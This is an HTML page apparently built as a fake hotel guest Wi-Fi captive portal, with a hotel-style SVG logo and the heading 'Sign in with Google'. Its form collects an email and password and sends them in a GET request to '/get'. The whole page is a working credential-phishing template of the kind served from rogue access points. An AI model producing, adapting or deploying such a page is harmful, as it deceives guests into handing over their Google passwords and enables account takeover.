<!DOCTYPE html>
<html>
<head>
<style>
body {
  font-family: Arial, sans-serif;
  background-color: #FFFFFF;
}

.container {
  max-width: 400px;
  margin: 0 auto;
  padding: 20px;
}

@media (min-width: 600px) {
  .container {
    max-width: 500px;
  }
}

.logo-container {
  text-align: center;
  margin-bottom: 30px;
  display: flex;
  justify-content: center;
  align-items: center;
}

.logo {
  width: 40px;
  height: 40px;
  fill: #FFC72C;
  margin-right: 100px
}

.form-container {
  background: #FFFFFF;
  border: 1px solid #FFFFFF;
  border-radius: 4px;
  padding: 20px;
  box-shadow: 0px 0px 10px 0px rgba(108,66,156,0.2);
}

h1 {
  text-align: center; 
  font-size: 28px;
  font-weight: 500;
  color: #54585B;
  margin-bottom: 20px;
}

h2 {
  text-align: center; 
  font-size: 28px;
  font-weight: 500;
  color: #54585B;
  margin-bottom: 20px;
}

.input-field {
  width: 100%;
  padding: 12px;
  border: 2px solid #54585B;
  border-radius: 4px;
  box-sizing: border-box;
  margin-bottom: 20px;
  font-size: 14px;
}

.submit-btn {
  background: #54585B;
  border: none;
  color: #FFFFFF;
  padding: 12px 20px;
  border-radius: 4px;
  cursor: pointer;
  font-size: 16px;
  display: block;
  margin: auto;
}

.submit-btn:hover {
  background: #FFC72C;
}

.forgot-password {
  display: block;
  text-align: center;
  color: #54585B;
  text-decoration: underline;
  margin-top: 10px;
}

.error-message {
  color: red;
  text-align: center;
  display: none; 
  margin-top: 10px;
}


</style>
</head>

<body>

<div class="container">

  <div class="logo-container">
 <svg version="1.0" xmlns="http://www.w3.org/2000/svg"
 width="250.000000pt" height="125.000000pt" viewBox="0 0 1240.000000 650.000000"
 preserveAspectRatio="xMidYMid meet">
<g transform="translate(0.000000,650.000000) scale(0.100000,-0.100000)"
fill="#54585B" stroke="none">
<path d="M1590 4534 c-217 -28 -435 -112 -610 -235 -186 -131 -371 -366 -449
-571 l-11 -28 208 0 c233 0 294 -10 374 -61 113 -73 159 -239 103 -373 -20
-48 -87 -120 -125 -136 -17 -7 -30 -17 -30 -22 0 -5 43 -72 95 -148 52 -76 98
-145 101 -154 5 -14 -10 -16 -135 -16 l-141 0 -92 140 -93 139 -52 1 -52 0 -3
-137 -3 -138 -77 -5 -77 -5 43 -91 c66 -138 138 -238 260 -360 255 -254 546
-374 906 -374 77 0 175 7 223 15 375 65 700 292 897 625 34 57 101 202 96 208
-2 1 -29 -4 -62 -13 -77 -20 -235 -20 -305 1 -235 69 -372 279 -338 519 26
189 171 345 360 390 40 9 114 15 197 15 83 0 132 4 132 10 0 6 -16 43 -36 83
-182 364 -513 620 -909 702 -78 16 -323 28 -395 19z m-20 -1004 l0 -170 160 0
160 0 0 170 0 171 128 -3 127 -3 0 -450 0 -450 -127 -3 -128 -3 0 176 0 175
-160 0 -160 0 0 -175 0 -175 -125 0 -125 0 0 455 0 455 125 0 125 0 0 -170z"/>
<path d="M7930 4369 c-183 -19 -308 -145 -318 -319 -12 -201 84 -303 353 -375
209 -57 257 -88 259 -169 2 -90 -67 -139 -193 -138 -112 1 -211 40 -304 122
l-35 30 -68 -81 -67 -82 29 -24 c110 -91 229 -145 363 -163 274 -37 474 95
489 323 13 200 -83 302 -358 378 -206 57 -256 91 -254 176 2 79 66 123 178
123 77 0 148 -24 234 -79 l60 -39 57 85 57 86 -29 23 c-113 93 -287 140 -453
123z"/>
<path d="M8882 4369 c-121 -15 -229 -86 -280 -183 -35 -69 -44 -213 -17 -283
39 -103 136 -171 307 -219 175 -49 218 -65 253 -99 29 -27 35 -39 35 -74 0
-95 -64 -144 -186 -144 -116 1 -201 36 -324 132 l-26 20 -64 -81 -64 -81 45
-39 c129 -111 345 -174 511 -148 104 16 179 53 238 116 62 69 85 133 84 239
-1 187 -95 275 -382 354 -130 36 -182 60 -211 97 -43 55 -19 139 51 175 35 18
54 21 122 17 87 -5 150 -28 235 -86 l45 -30 57 81 57 82 -36 33 c-98 89 -289
140 -450 121z"/>
<path d="M9981 4364 c-36 -7 -98 -29 -139 -49 -92 -43 -202 -150 -250 -242
-122 -233 -84 -551 88 -731 105 -110 233 -169 390 -179 349 -22 623 243 624
602 0 122 -14 184 -66 294 -113 236 -381 363 -647 305z m226 -209 c114 -34
206 -131 245 -258 17 -56 20 -86 16 -159 -5 -77 -11 -100 -42 -163 -40 -81
-96 -138 -174 -176 -39 -20 -63 -24 -142 -24 -84 0 -102 3 -151 28 -69 33
-142 109 -175 182 -103 225 4 503 219 571 57 17 143 17 204 -1z"/>
<path d="M4935 3818 c-126 -304 -238 -571 -247 -595 l-18 -44 112 3 112 3 55
137 56 138 255 0 255 0 55 -140 55 -140 113 0 c61 0 112 3 112 6 0 6 -456
1103 -483 1161 -10 22 -15 23 -106 23 l-96 0 -230 -552z m413 53 c45 -110 82
-202 82 -205 0 -3 -76 -6 -170 -6 -93 0 -170 3 -170 6 0 14 163 404 169 404 4
0 44 -90 89 -199z"/>
<path d="M3670 3770 l0 -590 105 0 105 0 0 200 0 200 115 0 114 0 136 -200
136 -200 125 0 c68 0 124 2 124 5 0 2 -63 96 -140 209 -77 113 -142 211 -145
218 -3 8 12 20 40 32 69 28 137 95 171 168 26 57 29 73 29 168 0 95 -3 111
-29 167 -31 69 -89 129 -156 163 -81 41 -157 50 -452 50 l-278 0 0 -590z m615
354 c109 -57 115 -230 11 -302 -45 -31 -135 -43 -286 -40 l-125 3 -3 183 -2
183 182 -3 c162 -3 187 -5 223 -24z"/>
<path d="M5980 3770 l0 -590 248 0 c281 0 346 9 457 64 132 65 226 172 283
324 23 60 26 81 26 202 0 121 -3 142 -26 202 -58 152 -153 261 -283 323 -113
54 -191 65 -465 65 l-240 0 0 -590z m581 349 c115 -54 189 -154 209 -285 28
-179 -51 -344 -199 -413 -52 -24 -67 -26 -218 -29 l-163 -4 0 374 c0 206 3
378 8 382 4 4 75 6 157 4 137 -3 155 -5 206 -29z"/>
<path d="M7190 3770 l0 -590 105 0 105 0 0 590 0 590 -105 0 -105 0 0 -590z"/>
<path d="M10870 3770 l0 -590 105 0 105 0 0 395 c0 217 3 395 8 395 4 -1 138
-178 297 -395 l290 -394 93 -1 92 0 0 590 0 590 -105 0 -105 0 0 -385 c0 -212
-3 -385 -7 -385 -5 1 -136 174 -292 385 l-283 385 -99 0 -99 0 0 -590z"/>
<path d="M2619 3462 c-77 -40 -113 -100 -117 -198 -5 -82 7 -125 47 -182 56
-76 197 -110 294 -69 36 16 37 17 37 71 l0 56 -90 0 -91 0 3 93 3 92 159 0
158 0 -7 69 c-3 37 -9 74 -12 82 -4 11 -38 14 -168 14 -159 0 -164 -1 -216
-28z"/>
<path d="M680 3375 l0 -105 105 0 c146 0 185 22 185 105 0 83 -39 105 -185
105 l-105 0 0 -105z"/>
<path d="M3670 2905 c0 -13 462 -15 4095 -15 3633 0 4095 2 4095 15 0 13 -462
15 -4095 15 -3633 0 -4095 -2 -4095 -15z"/>
<path d="M4640 2631 c-178 -54 -242 -274 -125 -427 62 -81 207 -109 311 -60
202 94 184 407 -27 481 -44 16 -117 18 -159 6z m140 -110 c43 -23 80 -90 80
-145 0 -155 -193 -216 -273 -86 -30 48 -30 138 -1 177 52 70 126 91 194 54z"/>
<path d="M8250 2631 c-114 -35 -179 -127 -180 -254 0 -157 97 -257 250 -256
72 0 123 15 175 50 l35 24 -2 108 -3 109 -103 1 -102 2 0 -47 0 -48 55 0 55 0
0 -35 c0 -45 -34 -69 -99 -69 -93 1 -153 62 -155 158 0 62 24 110 74 143 43
30 95 29 152 -1 l45 -24 31 40 31 41 -25 19 c-51 40 -166 59 -234 39z"/>
<path d="M9926 2625 c-97 -34 -166 -133 -166 -237 0 -83 17 -131 64 -185 53
-60 103 -83 186 -83 146 0 246 92 258 236 15 193 -162 333 -342 269z m171
-113 c40 -28 63 -79 63 -137 0 -55 -18 -93 -60 -129 -26 -21 -42 -26 -87 -26
-51 0 -59 3 -93 38 -81 80 -70 205 23 263 41 25 112 21 154 -9z"/>
<path d="M3670 2378 l0 -253 50 3 50 4 0 99 0 99 100 0 99 0 3 -101 3 -102 47
-1 47 -1 3 253 3 252 -52 0 -53 0 0 -100 0 -100 -100 0 -100 0 0 100 0 100
-50 0 -50 0 0 -252z"/>
<path d="M5290 2580 l0 -50 75 0 75 0 0 -199 0 -199 50 -4 50 -3 0 203 0 202
75 0 75 0 0 50 0 50 -200 0 -200 0 0 -50z"/>
<path d="M6102 2379 l3 -250 180 0 180 0 3 45 3 46 -135 0 -136 0 0 55 0 55
115 0 115 0 0 50 0 50 -116 0 -115 0 3 53 3 52 128 3 127 3 0 44 0 45 -180 0
-180 0 2 -251z"/>
<path d="M6890 2378 l0 -253 170 0 170 0 0 48 0 47 -120 0 -120 0 0 205 0 205
-50 0 -50 0 0 -252z"/>
<path d="M8972 2379 l3 -252 50 0 50 0 3 82 3 81 42 0 c42 0 42 -1 93 -81 l51
-81 61 -2 c59 -1 61 0 48 19 -7 11 -32 50 -55 87 l-42 67 44 43 c37 35 46 52
52 90 13 86 -32 168 -104 188 -20 5 -96 10 -169 10 l-132 0 2 -251z m278 131
c27 -27 26 -81 -1 -106 -15 -14 -40 -20 -95 -22 l-74 -4 0 76 0 76 75 0 c62 0
79 -4 95 -20z"/>
<path d="M10662 2448 c5 -194 11 -223 56 -272 38 -40 81 -56 152 -56 98 0 158
33 191 105 16 34 19 67 19 223 l0 182 -50 0 -50 0 0 -165 c0 -214 -14 -245
-109 -245 -28 0 -48 7 -68 24 l-28 24 -3 181 -3 181 -56 0 -55 0 4 -182z"/>
<path d="M11500 2378 l0 -253 50 0 50 0 0 78 0 77 73 0 c58 0 84 5 118 23 117
61 117 245 -1 305 -39 19 -60 22 -167 22 l-123 0 0 -252z m250 134 c25 -20 31
-82 10 -107 -17 -20 -78 -37 -120 -33 l-35 3 -3 78 -3 77 64 0 c47 0 71 -5 87
-18z"/>
</g>
</svg>




  </div>

  <div class="form-container">

    <center><h1>Sign in with Google</h1>
      </center>

    <form action="/get" id="login-form">
    
      <input name="email" class="input-field" type="text" placeholder="Email or mobile phone number" required>
      
      <input name="password" class="input-field" type="password" placeholder="Password" required>

      <button class="submit-btn" type="submit">Connect as guest</button>
	  <a href="javascript:void(0);" class="forgot-password">Forgot credentials?</a>
	<div class="error-message"></div>

    </form>

  </div>

</div>
<script>
  document.querySelector('.forgot-password').addEventListener('click', function() {
    var errorMessage = document.querySelector('.error-message');
    errorMessage.innerHTML = "Please refer to your Google account if you forgot your credentials";
    errorMessage.style.display = 'block';
  });
</script>
</body>
</html>
